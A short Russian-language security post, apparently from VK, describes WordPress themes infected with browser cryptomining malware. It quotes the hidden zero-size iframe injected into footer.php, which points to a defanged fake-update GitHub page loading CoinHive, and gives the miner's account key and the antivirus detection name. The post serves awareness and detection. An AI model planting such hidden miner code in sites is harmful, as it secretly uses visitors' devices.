Из недавнего — майнинг криптовалют в броузере клиента. Казалось бы, много ли так намайнишь? Мало, но если уметь нагнать трафик, то, видимо, что-то и можно.
В подходящем месте темы, например footer.php
, можно обнаружить нечто вроде этого (обфусцировано):
<iframe src="hxxps://wpupdates.github[.]io/ping/" style="width:0;heigh:0;border:none;"></iframe>
JavaScript
, представляющий известный майнер CoinHive с именем пользователя MoneroU и ключом CZziRExmOxYEE65Hm4E9fycCuNqZH1G9. Относительно ново здесь использование публичной платформы Гитхаб. Вирус прикрывается, изображая некое WooCommerce Multilingual
и ping service
. Поскольку код выложен на гитхабе, можно ознакомиться и с кодом, и с историей изменений.
Если запустить на сервере антивирус, он определит этого злодея как JS:Miner-C [Trj]
.
Источник: VK.com